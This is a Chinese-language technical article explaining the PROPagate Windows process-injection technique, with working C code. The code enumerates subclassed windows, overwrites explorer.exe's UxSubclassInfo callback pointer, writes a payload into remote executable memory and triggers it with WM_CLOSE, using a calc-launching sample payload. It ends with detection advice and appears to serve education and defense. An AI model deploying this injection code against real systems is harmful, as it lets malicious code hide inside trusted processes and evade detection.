Windows进程注入技术之PROPagate详解<\/h1>

一、技术概述<\/h2>
PROPagate是一种新型的进程注入技术，由Hexacorn公司的安全研究人员Adam在2017年10月首次提出。该技术利用Windows窗口子类化机制，通过修改子类头部中的回调函数指针，实现在目标进程中执行任意代码的目的。<\/p>

技术特点<\/h3>
无需在远程进程中创建新线程<\/li>
利用合法的窗口消息机制触发代码执行<\/li>
主要针对使用子类化窗口的进程（如explorer.exe）<\/li>
已被Smoke Loader和RIG Exploit Kit等恶意软件采用<\/li> <\/ul>
二、技术原理<\/h2>

1. 窗口子类化机制<\/h3>
Windows中的窗口子类化允许应用程序拦截和处理发送到特定窗口的消息。系统通过以下关键结构体实现这一机制：<\/p>
typedef<\/span> struct<\/span> _SUBCLASS_CALL {
<\/span><\/span>    SUBCLASSPROC pfnSubclass;  \/\/ 子类过程函数指针
<\/span><\/span><\/span><\/span>    WPARAM uIdSubclass;       \/\/ 唯一子类标识符
<\/span><\/span><\/span><\/span>    DWORD_PTR dwRefData;      \/\/ 可选引用数据
<\/span><\/span><\/span><\/span>} SUBCLASS_CALL, *<\/span>PSUBCLASS_CALL;
<\/span><\/span>
<\/span><\/span>typedef<\/span> struct<\/span> _SUBCLASS_FRAME {
<\/span><\/span>    UINT uCallIndex;          \/\/ 下一个要调用的回调索引
<\/span><\/span><\/span><\/span>    UINT uDeepestCall;        \/\/ 堆栈上最深的uCallIndex
<\/span><\/span><\/span><\/span>    struct<\/span> _SUBCLASS_FRAME *<\/span>pFramePrev; \/\/ 前一个子类帧指针
<\/span><\/span><\/span><\/span>    struct<\/span> _SUBCLASS_HEADER *<\/span>pHeader;   \/\/ 关联的头部指针
<\/span><\/span><\/span><\/span>} SUBCLASS_FRAME, *<\/span>PSUBCLASS_FRAME;
<\/span><\/span>
<\/span><\/span>typedef<\/span> struct<\/span> _SUBCLASS_HEADER {
<\/span><\/span>    UINT uRefs;               \/\/ 子类计数
<\/span><\/span><\/span><\/span>    UINT uAlloc;              \/\/ 分配的子类调用节点数
<\/span><\/span><\/span><\/span>    UINT uCleanup;            \/\/ 要清理的调用节点索引
<\/span><\/span><\/span><\/span>    DWORD dwThreadId;         \/\/ 挂钩窗口的线程ID
<\/span><\/span><\/span><\/span>    SUBCLASS_FRAME *<\/span>pFrameCur; \/\/ 当前子类帧指针
<\/span><\/span><\/span><\/span>    SUBCLASS_CALL CallArray[1<\/span>]; \/\/ 打包的调用节点数组基址
<\/span><\/span><\/span><\/span>} SUBCLASS_HEADER, *<\/span>PSUBCLASS_HEADER;
<\/span><\/span><\/code><\/pre>2. 注入流程<\/h3>

查找目标窗口及其子类头部<\/li>
读取原始子类头部信息<\/li>
在目标进程中分配内存并写入恶意代码<\/li>
修改子类头部中的回调函数指针<\/li>
通过窗口消息触发代码执行<\/li>
恢复原始子类头部<\/li>
<\/ol>
三、技术实现<\/h2>
1. 枚举目标窗口<\/h3>
首先需要找到具有子类化窗口的目标进程，通常使用以下API：<\/p>
EnumWindows\/<\/span>EnumDesktopWindows
<\/span><\/span>EnumChildWindows
<\/span><\/span>EnumProps\/<\/span>EnumPropsEx
<\/span><\/span><\/code><\/pre>具体实现步骤：<\/p>

调用EnumWindows<\/code>枚举顶层窗口<\/li>
在回调函数EnumWindowsProc<\/code>中调用EnumChildWindows<\/code><\/li>
在回调函数EnumChildWindowsProc<\/code>中调用EnumProps<\/code><\/li>
检查属性列表中是否存在"UxSubclassInfo"或"CC32SubclassInfo"<\/li>
<\/ol>
2. 关键代码实现<\/h3>
窗口属性枚举回调<\/h4>
BOOL CALLBACK PropEnumProc<\/span>(HWND hwnd, LPCTSTR lpszString, HANDLE hData) {
<\/span><\/span>    WINPROPS wp;
<\/span><\/span>    HANDLE hp;
<\/span><\/span>    
<\/span><\/span>    hp =<\/span> GetProp(hwnd, L<\/span>"UxSubclassInfo"<\/span>);
<\/span><\/span>    if<\/span>(hp ==<\/span> NULL)
<\/span><\/span>        hp =<\/span> GetProp(hwnd, L<\/span>"CC32SubclassInfo"<\/span>);
<\/span><\/span>    
<\/span><\/span>    if<\/span>(hp !=<\/span> NULL) {
<\/span><\/span>        ZeroMemory(&<\/span>wp, sizeof<\/span>(wp));
<\/span><\/span>        GetWindowThreadProcessId(hwnd, &<\/span>wp.dwPid);
<\/span><\/span>        wp.hProperty =<\/span> hp;
<\/span><\/span>        wp.hChildWnd =<\/span> hwnd;
<\/span><\/span>        wp.hParentWnd =<\/span> GetParent(hwnd);
<\/span><\/span>        GetClassName(wp.hParentWnd, wp.ParentClassName, MAX_PATH);
<\/span><\/span>        GetClassName(hwnd, wp.ChildClassName, MAX_PATH);
<\/span><\/span>        GetProcessImageName(wp.dwPid, wp.ImageName, MAX_PATH);
<\/span><\/span>        
<\/span><\/span>        if<\/span>(!<\/span>IsEntry(&<\/span>wp)) {
<\/span><\/span>            windows.push_back(wp);
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    return<\/span> TRUE;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>完整的注入函数<\/h4>
VOID propagate<\/span>(LPVOID payload, DWORD payloadSize) {
<\/span><\/span>    HANDLE hp, p;
<\/span><\/span>    DWORD id;
<\/span><\/span>    HWND pwh, cwh;
<\/span><\/span>    SUBCLASS_HEADER sh;
<\/span><\/span>    LPVOID psh, pfnSubclass;
<\/span><\/span>    SIZE_T rd, wr;
<\/span><\/span>    
<\/span><\/span>    \/\/ 1. 获取父窗口句柄
<\/span><\/span><\/span><\/span>    pwh =<\/span> FindWindow(L<\/span>"Progman"<\/span>, NULL);
<\/span><\/span>    
<\/span><\/span>    \/\/ 2. 获取子窗口句柄
<\/span><\/span><\/span><\/span>    cwh =<\/span> FindWindowEx(pwh, NULL, L<\/span>"SHELLDLL_DefView"<\/span>, NULL);
<\/span><\/span>    
<\/span><\/span>    \/\/ 3. 获取子类头部句柄
<\/span><\/span><\/span><\/span>    p =<\/span> GetProp(cwh, L<\/span>"UxSubclassInfo"<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 4. 获取explorer.exe的进程ID
<\/span><\/span><\/span><\/span>    GetWindowThreadProcessId(cwh, &<\/span>id);
<\/span><\/span>    
<\/span><\/span>    \/\/ 5. 打开explorer.exe进程
<\/span><\/span><\/span><\/span>    hp =<\/span> OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
<\/span><\/span>    
<\/span><\/span>    \/\/ 6. 读取当前子类头部内容
<\/span><\/span><\/span><\/span>    ReadProcessMemory(hp, (LPVOID)p, &<\/span>sh, sizeof<\/span>(sh), &<\/span>rd);
<\/span><\/span>    
<\/span><\/span>    \/\/ 7. 分配内存用于新的子类头部
<\/span><\/span><\/span><\/span>    psh =<\/span> VirtualAllocEx(hp, NULL, sizeof<\/span>(sh), MEM_RESERVE|<\/span>MEM_COMMIT, PAGE_READWRITE);
<\/span><\/span>    
<\/span><\/span>    \/\/ 8. 分配内存用于payload
<\/span><\/span><\/span><\/span>    pfnSubclass =<\/span> VirtualAllocEx(hp, NULL, payloadSize, MEM_RESERVE|<\/span>MEM_COMMIT, PAGE_EXECUTE_READWRITE);
<\/span><\/span>    
<\/span><\/span>    \/\/ 9. 写入payload到内存
<\/span><\/span><\/span><\/span>    WriteProcessMemory(hp, pfnSubclass, payload, payloadSize, &<\/span>wr);
<\/span><\/span>    
<\/span><\/span>    \/\/ 10. 修改回调函数指针并写回进程
<\/span><\/span><\/span><\/span>    sh.CallArray[0<\/span>].pfnSubclass =<\/span> (SUBCLASSPROC)pfnSubclass;
<\/span><\/span>    WriteProcessMemory(hp, psh, &<\/span>sh, sizeof<\/span>(sh), &<\/span>wr);
<\/span><\/span>    
<\/span><\/span>    \/\/ 11. 使用SetProp更新子类过程
<\/span><\/span><\/span><\/span>    SetProp(cwh, L<\/span>"UxSubclassInfo"<\/span>, psh);
<\/span><\/span>    
<\/span><\/span>    \/\/ 12. 通过窗口消息触发payload
<\/span><\/span><\/span><\/span>    PostMessage(cwh, WM_CLOSE, 0<\/span>, 0<\/span>);
<\/span><\/span>    
<\/span><\/span>    \/\/ 13. 恢复原始子类头部
<\/span><\/span><\/span><\/span>    SetProp(cwh, L<\/span>"UxSubclassInfo"<\/span>, p);
<\/span><\/span>    
<\/span><\/span>    \/\/ 14. 释放内存并关闭句柄
<\/span><\/span><\/span><\/span>    VirtualFreeEx(hp, psh, 0<\/span>, MEM_DECOMMIT|<\/span>MEM_RELEASE);
<\/span><\/span>    VirtualFreeEx(hp, pfnSubclass, 0<\/span>, MEM_DECOMMIT|<\/span>MEM_RELEASE);
<\/span><\/span>    CloseHandle(hp);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3. Payload设计<\/h3>
Payload需要符合特定的函数原型：<\/p>
typedef<\/span> LRESULT<\/span> (CALLBACK*<\/span> SUBCLASSPROC)(
<\/span><\/span>    HWND hWnd, 
<\/span><\/span>    UINT uMsg, 
<\/span><\/span>    WPARAM wParam, 
<\/span><\/span>    LPARAM lParam, 
<\/span><\/span>    UINT_PTR uIdSubclass, 
<\/span><\/span>    DWORD_PTR dwRefData
<\/span><\/span>);
<\/span><\/span><\/code><\/pre>示例payload（弹计算器）：<\/p>
LRESULT CALLBACK SubclassProc<\/span>(
<\/span><\/span>    HWND hWnd, 
<\/span><\/span>    UINT uMsg, 
<\/span><\/span>    WPARAM wParam, 
<\/span><\/span>    LPARAM lParam, 
<\/span><\/span>    UINT_PTR uIdSubclass, 
<\/span><\/span>    DWORD_PTR dwRefData) 
<\/span><\/span>{
<\/span><\/span>    \/\/ 只处理WM_CLOSE消息，避免多次执行
<\/span><\/span><\/span><\/span>    if<\/span>(uMsg !=<\/span> WM_CLOSE) return<\/span> 0<\/span>;
<\/span><\/span>    
<\/span><\/span>    WinExec_t pWinExec;
<\/span><\/span>    DWORD szWinExec[2<\/span>], szCalc[2<\/span>];
<\/span><\/span>    
<\/span><\/span>    \/\/ WinExec
<\/span><\/span><\/span><\/span>    szWinExec[0<\/span>] =<\/span> 0x456E6957<\/span>;  \/\/ "EniW"
<\/span><\/span><\/span><\/span>    szWinExec[1<\/span>] =<\/span> 0x00636578<\/span>;  \/\/ "cex\0"
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    \/\/ calc
<\/span><\/span><\/span><\/span>    szCalc[0<\/span>] =<\/span> 0x636C6163<\/span>;     \/\/ "clac"
<\/span><\/span><\/span><\/span>    szCalc[1<\/span>] =<\/span> 0<\/span>;              \/\/ "\0"
<\/span><\/span><\/span><\/span>    
<\/span><\/span>    pWinExec =<\/span> (WinExec_t)xGetProcAddress(szWinExec);
<\/span><\/span>    if<\/span>(pWinExec !=<\/span> NULL) {
<\/span><\/span>        pWinExec((LPSTR)szCalc, SW_SHOW);
<\/span><\/span>    }
<\/span><\/span>    
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>四、技术优势<\/h2>

隐蔽性强<\/strong>：不创建新线程，减少被检测的风险<\/li>
利用合法机制<\/strong>：使用Windows原生API和窗口消息机制<\/li>
针对高权限进程<\/strong>：常针对explorer.exe等以中等完整性级别运行的进程<\/li>
灵活性高<\/strong>：可以精确控制代码执行时机<\/li>
<\/ol>
五、防御措施<\/h2>

监控窗口属性修改<\/strong>：特别是"UxSubclassInfo"和"CC32SubclassInfo"属性的修改<\/li>
检测异常窗口消息<\/strong>：监控非正常的WM_CLOSE等消息发送<\/li>
进程行为分析<\/strong>：检测explorer.exe等系统进程的异常内存分配和代码执行<\/li>
API钩子<\/strong>：监控关键API如SetProp、VirtualAllocEx等的调用<\/li>
<\/ol>
六、总结<\/h2>
PROPagate注入技术展示了攻击者如何利用Windows的合法机制实现代码注入。这种技术因其隐蔽性和有效性，已被多个恶意软件家族采用。理解其工作原理对于开发有效的防御措施至关重要。安全研究人员和开发人员应关注此类技术，并在安全产品中实施相应的检测和防护机制。<\/p>